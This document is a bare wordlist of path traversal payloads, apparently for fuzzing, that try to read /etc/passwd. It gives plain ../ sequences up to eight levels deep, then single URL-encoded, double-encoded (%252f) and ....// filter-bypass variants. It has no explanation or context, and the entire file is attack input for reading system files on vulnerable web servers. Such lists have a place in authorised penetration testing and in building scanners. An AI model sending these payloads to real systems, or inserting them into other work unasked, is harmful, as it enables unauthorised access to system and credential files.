/etc/passwd
/../etc/passwd
/../../etc/passwd
/../../../etc/passwd
/../../../../etc/passwd
/../../../../../etc/passwd
/../../../../../../etc/passwd
/../../../../../../../etc/passwd
/../../../../../../../../etc/passwd
/..%2fetc%2fpasswd
/..%2f..%2fetc%2fpasswd
/..%2f..%2f..%2fetc%2fpasswd
/..%2f..%2f..%2f..%2fetc%2fpasswd
/..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e%2fetc%2fpasswd
/%2e%2e%2f%2e%2e%2fetc%2fpasswd
/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/..%252fetc%252fpasswd
/..%252f..%252fetc%252fpasswd
/..%252f..%252f..%252fetc%252fpasswd
/..%252f..%252f..%252f..%252fetc%252fpasswd
/..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
....//etc/passwd
....//....//etc/passwd
....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//etc/passwd
